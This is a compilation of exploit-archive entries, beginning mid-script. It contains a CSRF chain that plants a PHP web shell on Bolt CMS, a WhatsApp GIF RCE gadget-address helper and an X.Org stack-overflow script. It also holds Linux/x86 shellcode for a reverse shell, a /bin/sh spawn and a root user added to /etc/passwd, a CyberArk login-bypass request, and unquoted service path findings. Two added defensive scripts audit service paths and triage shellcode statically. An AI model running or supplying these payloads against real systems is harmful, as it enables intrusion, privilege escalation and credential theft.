token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);

}


}
xhr.send(null);
}



upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
"Content-Disposition: form-data; name=\"file_upload[select][]\"; filename=\"r3m0t3nu11.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php system($_GET['test']);?>\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data; name=\"file_upload[upload]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data; name=\"file_upload[_token]\"\r\n" +
"\r\n" +
csrfToken + "\r\n" +
"-----------------------------190530466613268610451083392867--\r\n";

const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}




Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body1 =
"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
xhr.send(body1);
}
Token();
</script>

proof of concept :

https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing

https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing

Greetz to :
Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
Virus,m7md1337,D3vil1337,and all my friends

Zilab Remote Console Server 3.2.9 zrcs Unquoted Service Path


Zilab Remote Console Server version 3.2.9 suffers from a zrcs unquoted service path vulnerability.


MD5 | 654f651899ebc74b16d8c8ca9a6a8b61

# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: Zilab Software Inc
# Version : Zilab Remote Console Server 3.2.9
# Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support
# Tested on Windows 10
# CVE : N/A


C:\Users\Administrator>sc qc zrcs
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: zrcs
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Zilab Remote Console Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Lavasoft 2.3.4.7 LavasoftTcpService Unquoted Service Path


Lavasoft version 2.3.4.7 suffers from a LavasoftTcpService unquoted service path vulnerability.


MD5 | b158f77706a4c9ca81f62848d7d453fa

# Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path
# Author: Luis MedinaL
# Date: 2019-10-15
# Vendor Homepage: https://www.adaware.com/
# Software Link : https://www.adaware.com/antivirus
# Version : 2.3.4.7
# Tested on: Microsoft Windows 10 Pro x64 ESP

# Description:
# Lavasoft 2.3.4.7 installs LavasoftTcpService as a service with an unquoted service path

C:\Users\Luis ML>sc qc LavasoftTcpService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: LavasoftTcpService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : LavasoftTcpService
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
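The ActiveFax, Zilab and Lavasoft entries above share one root cause, so one added check serves all three (it is not from any of those posts): it parses `sc qc` output in the English and Spanish label forms shown, decides whether the binary path is unquoted and contains spaces, and produces the `sc config` line that quotes it. The sample outputs are constructed from the posts.

```python
"""Added example (not from the ActiveFax, Zilab or Lavasoft posts above):
parse `sc qc` output, flag an unquoted service binary path, and produce the
quoted path an administrator should set. Handles the English and Spanish
label sets shown on this page. Sample outputs are constructed from the posts."""
import re

NAME_LABELS = {"SERVICE_NAME", "NOMBRE_SERVICIO"}
PATH_LABELS = {"BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO"}


def parse_sc_qc(output):
    """Return (service_name, binary_path) from the text printed by `sc qc`."""
    name = path = None
    for line in output.splitlines():
        label, sep, value = line.partition(":")
        if not sep:
            continue
        label, value = label.strip().upper(), value.strip()
        if label in NAME_LABELS:
            name = value
        elif label in PATH_LABELS:
            path = value
    return name, path


def split_image_path(bin_path):
    """Split a service command line into (executable, arguments).
    For an unquoted path the executable is assumed to end at the first '.exe'."""
    bin_path = bin_path.strip()
    if bin_path.startswith('"'):
        end = bin_path.find('"', 1)
        if end == -1:
            return bin_path[1:], ""
        return bin_path[1:end], bin_path[end + 1:]
    m = re.match(r"(.*?\.exe)(.*)$", bin_path, re.IGNORECASE)
    return (m.group(1), m.group(2)) if m else (bin_path, "")


def is_unquoted_service_path(bin_path):
    """True when the executable path contains a space and is not quoted.
    The service manager then tries each space-delimited prefix of the path
    before the real binary, so a writable intermediate directory lets a
    planted file run with the service account's privileges."""
    if bin_path.strip().startswith('"'):
        return False
    exe, _ = split_image_path(bin_path)
    return " " in exe


def quoted_path(bin_path):
    """Return the command line with the executable wrapped in quotes."""
    exe, args = split_image_path(bin_path)
    return '"%s"%s' % (exe, args)


def remediation(service, bin_path):
    """`sc config` line that fixes the path; inner quotes are escaped for cmd."""
    fixed = quoted_path(bin_path).replace('"', '\\"')
    return 'sc config %s binPath= "%s"' % (service, fixed)


def audit(sc_qc_output):
    """Audit one `sc qc` dump; 'fix' is the remediation command or None."""
    service, path = parse_sc_qc(sc_qc_output)
    vulnerable = path is not None and is_unquoted_service_path(path)
    return {"service": service, "path": path, "unquoted": vulnerable,
            "fix": remediation(service, path) if vulnerable else None}


# constructed samples based on the sc qc dumps in the posts above
SC_QC_EN = r"""
SERVICE_NAME: ActiveFaxServiceNT
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
        SERVICE_START_NAME : .\Administrator
"""
SC_QC_ES = r"""
NOMBRE_SERVICIO: LavasoftTcpService
        TIPO               : 10  WIN32_OWN_PROCESS
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
        NOMBRE_INICIO_SERVICIO: LocalSystem
"""

if __name__ == "__main__":
    for sample in (SC_QC_EN, SC_QC_ES):
        print(audit(sample))
```

The check flags the configuration only; whether it is exploitable on a given host also depends on the ACLs of the intermediate directories.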


Whatsapp 2.19.216 Remote Code Execution


Whatsapp version 2.19.216 suffers from a remote code execution vulnerability.


MD5 | bb8020ea612d6105eb21db5cad4eec5d

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)

/*
*
* Introduction
* This native code file is meant to complement the WhatsApp GIF RCE exploit published by Awakened, by calculating the system() function address and the ROP gadget address for different types of devices, which can then be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link: https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/

#include <jni.h>
#include <string>
#include <cstdio>   // fopen, fseek, ftell, fread, snprintf
#include <cstdlib>  // malloc, free
#include <cstring>  // strcmp
#include <dlfcn.h>
#include <link.h>

typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;

//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}

//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}

//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}

//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}

extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}



extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}

X.Org X Server 1.20.4 Local Stack Overflow


X.Org X Server version 1.20.4 suffers from a local stack overflow vulnerability.


MD5 | 564ac3d1c52679d7e251c911238be5a0

# Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow
# Date: 2019-10-16
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor Homepage: https://www.x.org/
# Version: <= 1.20.4
# Tested on: Linux
# CVE: CVE-2019-17624

#!/usr/bin/python
#coding: utf-8

# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow) *
# ************************************************************************

import sys, time
import ctypes as ct

from ctypes.util import find_library

def access_violation(x11, current_display):
    # XQueryKeymap is handed a 1000-byte buffer where Xlib documents a 32-byte one
    keyboard = (ct.c_char * 1000)()
    x11.XQueryKeymap(current_display, keyboard)

if __name__ == '__main__':

    print("\n[*] Loading x11...\n")
    time.sleep(2)

    x11 = ct.cdll.LoadLibrary(find_library("X11"))
    # XOpenDisplay returns a Display*; without a declared return type ctypes
    # truncates the pointer to a C int on 64-bit builds
    x11.XOpenDisplay.restype = ct.c_void_p
    x11.XQueryKeymap.argtypes = [ct.c_void_p, ct.POINTER(ct.c_char)]
    current_display = x11.XOpenDisplay(None)
    if not current_display:
        print("\nError: could not open the X display...\n")
        sys.exit(1)

    print("[*] Exploiting...\n")
    time.sleep(1)

    try:
        access_violation(x11, current_display)

    except Exception:
        print("\nError...\n")
        sys.exit(1)

Linux/x86 Reverse Shell NULL Free 127.0.0.1:4444 Shellcode


91 bytes small Linux/x86 reverse shell NULL free 127.0.0.1:4444 shellcode.


MD5 | 3db8a3b1f503151d8569756ef3829a15

# Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
# Date: 2019-10-16
# Author: bolonobolo
# Tested on: Linux x86
# Software: N/A
# CVE: N/A

/*
global _start

section .text
_start:

;socket()
xor ecx, ecx ; zero ECX
xor ebx, ebx ; zero EBX
mul ebx ; zero EAX and EDX (EAX * EBX = 0)
inc cl ; ECX = 1 (SOCK_STREAM)
inc bl
inc bl ; EBX = 2 (AF_INET)
mov ax, 0x167 ; 359 = socket() on 32-bit Linux
int 0x80 ; call socket()

;connect() ; move the return value of socket()
xchg ebx, eax ; from EAX to EBX, ready for the next syscalls

; push the sockaddr structure onto the stack
dec cl
push ecx ; padding dword (0)

; sockaddr length for connect(): 0x16 = 22, more than the 16 bytes of a
; sockaddr_in; the kernel accepts it and ignores the extra bytes
mov dl, 0x16

; 127.0.0.1 in network byte order is the immediate 0x0100007f, which contains
; NULL bytes, so it is encoded as 4.3.3.130 minus 3.3.3.3
mov ecx, 0x04030382 ; mov ip in ecx
sub ecx, 0x03030303 ; subtract 3.3.3.3 from ip
push ecx ; load the real ip in the stack
push word 0x5c11 ; port 4444
push word 0x02 ; AF_INET family
lea ecx, [esp] ; ECX = pointer to the sockaddr
; EBX still contains the value of the opened socket
mov ax, 0x16a ; 362 = connect() on 32-bit Linux
int 0x80

; dup2()
xor ecx, ecx
mov cl, 0x3

dup2:
xor eax, eax
; EBX still contains the value of the opened socket
mov al, 0x3f ; 63 = dup2()
dec cl
int 0x80
jnz dup2 ; loop for fd 2, 1 and 0

; execve() from the previous polymorphic analysis, 25 bytes
cdq ; zero EDX
mul edx ; zero EAX
lea ecx, [eax] ; zero ECX
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx ; push NULL in stack
push esi ; push "//sh" in stack
push edi ; push "/bin" in stack
lea ebx, [esp] ; load stack pointer to ebx
mov al, 0xb ; load execve in eax
int 0x80
*/

#include <stdio.h>
#include <string.h>

/* Usual shellcode test build (32-bit code, executable data/stack segment):
 * gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode */

unsigned char code[] = \
"\x31\xc9\x31\xdb\xf7\xe3\xfe\xc1\xfe\xc3\xfe\xc3\x66\xb8\x67\x01\xcd\x80\x93\xfe\xc9\x51\xb2\x16\xb9\x82\x03\x03\x04\x81\xe9\x03\x03\x03\x03\x51\x66\x68\x11\x5c\x66\x6a\x02\x8d\x0c\x24\x66\xb8\x6a\x01\xcd\x80\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80";

int main(void)
{
    printf("Shellcode Length: %zu\n", strlen((char *)code));

    /* cast the buffer to a function pointer and jump into it */
    int (*ret)(void) = (int (*)(void))code;

    ret();

    return 0;
}

Linux/x86 execve /bin/sh Shellcode


25 bytes small Linux/x86 execve /bin/sh shellcode.


MD5 | d46a38b1d7ac05f490e35a9a1e3203e4

# Exploit Title: Linux/x86 - execve /bin/sh ShellCode (25 bytes)
# Date: 2019-10-14
# Author: bolonobolo
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# CVE: N/A

/*
global _start

section .text
_start:

cdq ; zero EDX
mul edx ; zero EAX
lea ecx, [eax] ; zero ECX (envp = NULL)
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx ; push NULL in stack (string terminator)
push esi ; push "//sh" in stack
push edi ; push "/bin" in stack, giving "/bin//sh"
lea ebx, [esp] ; load stack pointer to ebx (filename)
mov al, 0xb ; load execve in eax
int 0x80 ; execute

*/

#include <stdio.h>
#include <string.h>

/* Usual shellcode test build (32-bit code, executable data/stack segment):
 * gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode */

unsigned char code[] = \
"\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80";

int main(void)
{
    printf("Shellcode Length: %zu\n", strlen((char *)code));

    /* cast the buffer to a function pointer and jump into it */
    int (*ret)(void) = (int (*)(void))code;

    ret();

    return 0;
}

Linux/x86 Add User To /etc/passwd Shellcode


74 bytes small add user User to /etc/passwd shellcode.


MD5 | a35a72ae0f7c7e33a07fbb8cac9f46fa

# Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes)
# Date: 2019-10-12
# Author: bolonobolo
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# Comments: add user "User" to /etc/passwd
# CVE: N/A

/*
00000000 31DB xor ebx,ebx
00000002 31C9 xor ecx,ecx
00000004 66B90104 mov cx,0x401 ; O_WRONLY|O_APPEND
00000008 F7E3 mul ebx ; zero EAX and EDX
0000000A 53 push ebx ; NULL terminator
0000000B 6873737764 push dword 0x64777373 ; "sswd"
00000010 68632F7061 push dword 0x61702f63 ; "c/pa"
00000015 682F2F6574 push dword 0x74652f2f ; "//et" -> "//etc/passwd"
0000001A 8D1C24 lea ebx,[esp]
0000001D B005 mov al,0x5 ; open()
0000001F CD80 int 0x80
00000021 93 xchg eax,ebx ; fd -> EBX
00000022 F7E2 mul edx ; zero EAX and EDX
00000024 686E2F7368 push dword 0x68732f6e ; "n/sh"
00000029 683A2F6269 push dword 0x69622f3a ; ":/bi"
0000002E 68303A3A2F push dword 0x2f3a3a30 ; "0::/"
00000033 683A3A303A push dword 0x3a303a3a ; "::0:"
00000038 6855736572 push dword 0x72657355 ; "User" -> "User::0:0::/:/bin/sh"
0000003D 8D0C24 lea ecx,[esp]
00000040 B214 mov dl,0x14 ; 20 bytes
00000042 B004 mov al,0x4 ; write()
00000044 CD80 int 0x80
00000046 2C13 sub al,0x13 ; 20 - 19 = 1 = exit()
00000048 CD80 int 0x80
*/

#include <stdio.h>
#include <string.h>

/* Usual shellcode test build (32-bit code, executable data/stack segment):
 * gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
 * Appending to /etc/passwd only succeeds when run as root. */

unsigned char code[] = \
"\x31\xdb\x31\xc9\x66\xb9\x01\x04\xf7\xe3\x53"
"\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68"
"\x2f\x2f\x65\x74\x8d\x1c\x24\xb0\x05\xcd\x80"
"\x93\xf7\xe2\x68\x6e\x2f\x73\x68\x68\x3a\x2f"
"\x62\x69\x68\x30\x3a\x3a\x2f\x68\x3a\x3a\x30"
"\x3a\x68\x55\x73\x65\x72\x8d\x0c\x24\xb2\x14"
"\xb0\x04\xcd\x80\x2c\x13\xcd\x80";

int main(void)
{
    printf("Shellcode Length: %zu\n", strlen((char *)code));

    /* cast the buffer to a function pointer and jump into it */
    int (*ret)(void) = (int (*)(void))code;

    ret();

    return 0;
}
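The three shellcode posts above (reverse shell, execve, add user) each ship a raw byte string next to an assembly listing. What follows is an added example, not code from those posts: a static triage routine a defender can run over an extracted blob to confirm the NULL-free property the reverse-shell post claims, count syscall stubs, and recover the strings the code builds on the stack from runs of push imm32 / mov esi,imm32 / mov edi,imm32 instructions, which exposes "//etc/passwd" and the "User::0:0::/:/bin/sh" passwd line without executing anything. The byte strings are copied from the posts; the signature table is constructed for this example.

```python
"""Static triage of x86 Linux shellcode blobs (added example; not code from the posts above)."""

# Byte strings copied from the three shellcode posts on this page.
REVERSE_SHELL = (
    b"\x31\xc9\x31\xdb\xf7\xe3\xfe\xc1\xfe\xc3\xfe\xc3\x66\xb8\x67\x01\xcd\x80"
    b"\x93\xfe\xc9\x51\xb2\x16\xb9\x82\x03\x03\x04\x81\xe9\x03\x03\x03\x03\x51"
    b"\x66\x68\x11\x5c\x66\x6a\x02\x8d\x0c\x24\x66\xb8\x6a\x01\xcd\x80\x31\xc9"
    b"\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x99\xf7\xe2\x8d\x08\xbe"
    b"\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80"
)
EXECVE_SH = (
    b"\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57"
    b"\x8d\x1c\x24\xb0\x0b\xcd\x80"
)
ADDUSER = (
    b"\x31\xdb\x31\xc9\x66\xb9\x01\x04\xf7\xe3\x53"
    b"\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68"
    b"\x2f\x2f\x65\x74\x8d\x1c\x24\xb0\x05\xcd\x80"
    b"\x93\xf7\xe2\x68\x6e\x2f\x73\x68\x68\x3a\x2f"
    b"\x62\x69\x68\x30\x3a\x3a\x2f\x68\x3a\x3a\x30"
    b"\x3a\x68\x55\x73\x65\x72\x8d\x0c\x24\xb2\x14"
    b"\xb0\x04\xcd\x80\x2c\x13\xcd\x80"
)

# Constructed signature table: the encodings these samples use for syscalls and
# for loading the "/bin//sh" immediates (x86, little-endian).
SIGNATURES = {
    "int 0x80 (syscall)": b"\xcd\x80",
    "mov al, 0x0b (execve)": b"\xb0\x0b",
    "mov al, 0x05 (open)": b"\xb0\x05",
    "mov ax, 0x167 (socket)": b"\x66\xb8\x67\x01",
    "mov ax, 0x16a (connect)": b"\x66\xb8\x6a\x01",
    "mov esi, '//sh'": b"\xbe//sh",
    "mov edi, '/bin'": b"\xbf/bin",
}

IMM32_OPCODES = {0x68, 0xBE, 0xBF}  # push imm32, mov esi imm32, mov edi imm32


def is_null_free(blob):
    """A single 0x00 would cut the payload short when it travels through a C string."""
    return b"\x00" not in blob


def find_indicators(blob):
    """{signature name: [offsets]} for every signature present in blob."""
    hits = {}
    for name, sig in SIGNATURES.items():
        offsets, start = [], 0
        while True:
            i = blob.find(sig, start)
            if i < 0:
                break
            offsets.append(i)
            start = i + 1
        if offsets:
            hits[name] = offsets
    return hits


def recover_stack_strings(blob):
    """Strings assembled from runs of 4-byte immediates.

    Consecutive push/mov imm32 instructions build a string bottom-up on the
    stack, so the immediates are read back in reverse order. Runs shorter than
    two immediates or containing non-printable bytes are dropped as noise."""
    strings, run = [], []

    def flush():
        if len(run) >= 2:
            s = b"".join(reversed(run))
            if all(32 <= b < 127 for b in s):
                strings.append(s.decode("ascii"))
        run.clear()

    i = 0
    while i < len(blob):
        if blob[i] in IMM32_OPCODES and i + 5 <= len(blob):
            run.append(blob[i + 1:i + 5])
            i += 5
        else:
            flush()
            i += 1
    flush()
    return strings


def triage(blob):
    return {
        "length": len(blob),
        "null_free": is_null_free(blob),
        "strings": recover_stack_strings(blob),
        "indicators": {name: len(offs) for name, offs in find_indicators(blob).items()},
    }


if __name__ == "__main__":
    for label, blob in (("reverse shell", REVERSE_SHELL), ("execve", EXECVE_SH), ("adduser", ADDUSER)):
        print(label, triage(blob))
```

The immediate-run heuristic is deliberately simple: a stray 0x68 inside other code (the reverse shell's push word 0x5c11, for instance) starts a one-element run that the length and printability filters discard, so only the real string builds survive.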

CyberArk Password Vault 10.6 Authentication Bypass


CyberArk Password Vault version 10.6 suffers from an authentication bypass vulnerability.


MD5 | 6f4ab2aeece4f1688f2c9f812d93dc07

# Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass
# Date: 2019-10-16
# Author: Daniel Martinez Adan (adon90)
# Vendor: https://www.cyberark.com
# Software: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Collaborator: Luis Buendía (exoticpayloads)
# Version Affected: All

# It is possible to retrieve a valid cookie by injecting special characters
# in the username field:

vulnerable parameter:
pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername

URL:
/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx

Payload:
%1F

# Requirements:
# Using a valid ViewState -> if it doesn't work, go to the login panel to
# automatically generate a valid ViewState


# Once the valid cookie is obtained, it is possible to perform multiple
# actions in the PasswordVault, such as:
# - Retrieving valid user information (name, email, phone number, ...)
# - DoS
# - DNS enumeration via IP address
# - Possibly deleting users


# Login Bypass:

POST /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 2435
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca
Upgrade-Insecure-Requests: 1
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=gjUPDVmn3eCu84zX77GBo4yZO5ypQSyENJ%2FiPcWTNRTh9MtlLoZ6wvk6nCnoK8MeZfh%2BUA9fqjr80wBpvTA04Xkq8mnhgITyUkAx8PuG09vlGK7CBUxV4PHxPooSWtC%2F2RccxoRIuCucsVDXD27UTCiS4VmDoUWDORoecURYhzV2PH7pXm4XGNtNxeI%2FuLXPvwVYAOYkyUZZloZALalGC54rL24Iery7YR0uYvaC61OmxhCtYVy8zHlu7p2fK%2FUHxGxw3oMKrVJA%2BTCT1%2B5AoO4apN7uA%2BBmJzFhcl9vPrdlgCdu%2F1Ei%2F1O0oVn6BOd%2BhFDHdDbpKAX6xIJAWRfb9%2BGG8qobGKR%2B8Fvhao9hx3oCieBe7BvJL%2Fe9Y61tLtvnoLBHwc7uvG4V1lg5oNcQQeEZTGosZ3xrt3dR3kZe2b6vY0QG8YVlJCv56Xb1Ylr7mI7FIbUbKxbZvIkIPrPlKTvkzUTYGXsBOVXNy9KyAhI2%2B9DVkTFFhp%2FK4uWMCMxVq%2FgRxiEyukUbWvobQxSnUH4aNntJiD0Nmlc6UzwNxfvo%2FUNJx8i0yoPoi4PMomsQTE6%2FjtAQiO9rrf6syMLp2lLqXzQ7u90BqyUB9%2BOkn2C2AKZcir2KyT4vGcVOgEfUiZ7twd%2B4uq4acPpQBNto3zBCtgtKzW5iv8TfSCRuigtaT7Oz5qZvWq7UX%2Bqye9cugocb%2BUbaWVXJqcy0Gkdm0BPrRpiCbkSYqfx%2Fo7fYuDjEnMhXrOwBCUOfHhAcjXHZeeJY%2FKsnRP0Aa2%2BNzCOPimbvVEIq0CzTonYV6WFh1a0aDc0m8Qgchz9RnYR67efSftSQYpPzsBIdp0MsFuZ5AmSPROHH37N0zWVV%2BlVvPfwuSlLFV8d5Kq41KJtucYwenrZMq7lhKcDvaRZz5LOFR71DdrYwZoPloK4BK3yl8w8GaOnyRSQsQ0yW4xj5RbJLKN5J54I2fXDkgIVMJY6dbsztZ2JO%2BTpa5xPjJCIjXTR%2B4pJTqCBWc%2FLJ0xzz6x2EOOP9eMY8RH3GaEdg8Lww66zOzpIyXiOBT0VqyRTDxVd2UnEwJZDqwmcHh1n1nN%2BAQoWk2aJDBev9WiGLSx2GxtipLElZsWTcG5txklqFKB7b5mG2jIsx4%2B%2BRlAz2q6b8YJxKem1FnJwQhTyWZ5%2BgEnEGYIylH%2FsYP2eOcBJr5J7gamu%2FsqF9fZa4AJHxEx%2BspDmzm607z8H2AqOhWRemllMT87KVlCuTKiWw3gj7bhj19KtaE1AwmHid5ISXbt%2F5Gcw4LDvDkmfR1akym0jPGdECSyJG0qbhKiE3abdXESlMCURfX6g1W%2B9i8WZJ4hDtHcsPudD6yhp32NSDa2eVqw%3D%3D&__VIEWSTATEGENERATOR=4EAA75BD&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=yRuqYr%2BEabjm0oMhAb6WmehsX2QOYJhKOP0z9IJq8R2B9Md%2Fi17pZwRXSuLkNN72eNRdEnD%2Fcjr3L3KJLehz7ol6U%2BUONvRqU3dO66PrJIvFj%2BDji4%2FvZeOpLeaI0nY9mSU7%2FdBiOgLzdPnDtNu9G%2BwlR4Z8FdWPayd8UDMqShb%2FmObsqqsoxooNVf8jUFa1X98oKyPHztYNS6ip8fIBl4ksqvsPQhZnc%2Fj%2FniKwWp2GZ%2FmnEhIYMxVVx5tirrB16M4dJqa5ROmxuL%2FJcnW0hqFlAkAycTdep5r0nvN1kXXrIco4RhE52ZbP9yKpr5%2FOyVASLr42dCgOSKXcgkFL1A%3D%3D&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsern
